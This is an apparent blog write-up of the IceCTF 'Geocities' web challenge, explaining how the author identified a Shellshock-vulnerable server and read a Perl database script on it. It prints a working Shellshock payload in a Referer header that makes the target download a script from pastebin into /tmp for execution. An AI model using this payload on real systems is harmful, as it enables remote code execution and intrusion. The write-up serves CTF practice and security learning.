[IceCTF] Geocities – Web100

Chall:

I recently stumbled onto this old http://geocities.vuln.icec.tf/ site, it’s a miracle that it’s still up! It must be running some ancient technology and probably hasn’t been updated in years, it’s our lucky day boys!

Messing around and thinking about the description:

It must be running some ancient technology and probably hasn't been updated in years

So i decided to find popular vulnerable 1-2 years ago and found it. It’s SHELLSHOCK!

You can click here for more infor about shellshock

Let test this:

At first i thought the flag is in somewhere on the server, so i try to find it with

grep -r IceCTF *

and nothing appear!

So I read some source to find something good, and notice that maybe the perl file get_posts.pl is a hint:

#!/usr/bin/perl

use strict;
use DBI;

my $dbh = DBI->connect(
    "dbi:mysql:dbname=geocities;host=icectf_mariadb",
    "geocities",
    "geocities",
    { RaiseError => 1 },
) or die $DBI::errstr;

my $sth = $dbh->prepare("SELECT * from Posts ORDER BY post_date DESC");
$sth->execute();

my $row;
while ($row = $sth->fetchrow_arrayref()) {
    print "@$row[1];@$row[2];@$row[3]\n";
}

$sth->finish();
$dbh->disconnect();

Well well, maybe flag is in database

Also we can execute perl script directly :

Okay let create new .pl file which extract information in database for us and locate it in /tmp/ to be allowed to create and execute

Here final payload:

http://pastebin.com/raw/g5E5YXqt

And download it

Referer: () { :; }; echo -e "Content-Type: text/plain\n";   /bin/bash -c "wget http://pastebin.com/raw/g5E5YXqt -O /tmp/tsu.pl";

Time to get flag!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s